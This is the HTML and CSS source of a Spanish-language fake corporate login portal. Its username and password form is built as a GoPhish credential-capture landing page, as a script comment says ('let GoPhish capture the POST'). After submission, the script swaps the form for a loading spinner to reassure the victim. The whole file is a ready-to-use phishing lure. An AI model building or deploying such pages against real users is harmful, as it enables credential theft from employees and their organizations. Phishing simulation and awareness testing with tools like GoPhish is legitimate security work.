&lt;!DOCTYPE html&gt;
&lt;html lang=&quot;es&quot;&gt;
&lt;head&gt;
    &lt;meta charset=&quot;UTF-8&quot;/&gt;
      
    &lt;title&gt;Corporate Access Portal&lt;/title&gt;

    &lt;style&gt;
        body {
            margin: 0;
            font-family: &quot;Segoe UI&quot;, Arial, sans-serif;
            background: linear-gradient(135deg, #0b1220, #111827);
            color: #e5e7eb;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }

        .card {
            width: 380px;
            background: rgba(17, 24, 39, 0.95);
            padding: 35px;
            border-radius: 14px;
            box-shadow: 0 20px 40px rgba(0,0,0,0.6);
            text-align: center;
        }
        
        .logo {
            font-size: 18px;
            font-weight: 600;
            margin-bottom: 10px;
            letter-spacing: 1px;
            color: #60a5fa;
        }
        
        h2 {
            margin: 10px 0;
            font-size: 20px;
        }
        .subtitle {
            font-size: 13px;
            color: #9ca3af;
            margin-bottom: 25px;
        }
        
        input {
            width: 100%;
            padding: 12px;
            margin: 10px 0;
            border-radius: 8px;
            border: 1px solid #374151;
            background: #111827;
            color: white;
            outline: none;
            transition: 0.2s;
        }
    
        input:focus {
            border-color: #3b82f6;
        }
        
        button {
            width: 100%;
            padding: 12px;
            margin-top: 10px;
            background: #2563eb;
            border: none;
            border-radius: 8px;
            color: white;
            font-weight: 600;
            cursor: pointer;
            transition: 0.2s;
        }
        
        button:hover {
            background: #1d4ed8;
        }
        
        .footer {
            margin-top: 18px;
            font-size: 11px;
            color: #6b7280;
        }
        
        .status {
            font-size: 12px;
            color: #94a3b8;
            margin-bottom: 15px;
        }
            
        .spinner {
            display: none;
            margin: 15px auto;
            width: 38px;
            height: 38px;
            border: 4px solid #334155;
            border-top: 4px solid #60a5fa;
            border-radius: 50%;
            animation: spin 1s linear infinite;
        }
            
        @keyframes spin {
            100% { transform: rotate(360deg); }
        }

        &lt;/style&gt;
    &lt;/head&gt;
        
    &lt;body&gt;
        &lt;div class=&quot;card&quot;&gt;
        &lt;div class=&quot;logo&quot;&gt;Secure Corporate Portal&lt;/div&gt;
        
        &lt;h2&gt;Acceso autenticado&lt;/h2&gt;
        
        &lt;div class=&quot;status&quot;&gt;
            &lt;p&gt;Verificación de seguridad requerida antes de continuar&lt;/p&gt;
        &lt;/div&gt;
        
         &lt;form id=&quot;loginForm&quot; method=&quot;POST&quot; action=&quot;&quot;&gt;
            &lt;input type=&quot;text&quot; name=&quot;username&quot; placeholder=&quot;Usuario corporativo&quot;equired=&quot;&quot;/&gt;
            &lt;input type=&quot;password&quot; name=&quot;password&quot; placeholder=&quot;Contraseña&quot;equired=&quot;&quot;/&gt;
            &lt;button type=&quot;submit&quot;&gt;Iniciar sesión&lt;/button&gt;
        &lt;/form&gt;

        &lt;div class=&quot;spinner&quot; id=&quot;spinner&quot;&gt;&lt;/div&gt;
            &lt;div class=&quot;footer&quot;&gt;
                &lt;p&gt;Sistema de autenticación segura · Acceso restringido&lt;/p&gt;
            &lt;/div&gt;
        &lt;/div&gt;

        &lt;script&gt;
            document.getElementById(&quot;loginForm&quot;).addEventListener(&quot;submit&quot;, function() {
         
            // deja que GoPhish capture el POST
            setTimeout(() =&gt; {
            document.getElementById(&quot;loginForm&quot;).style.display = &quot;none&quot;;
            document.getElementById(&quot;spinner&quot;).style.display = &quot;block&quot;;
            }, 150);
            });
        &lt;/script&gt;
    &lt;/body&gt;
&lt;/html&gt;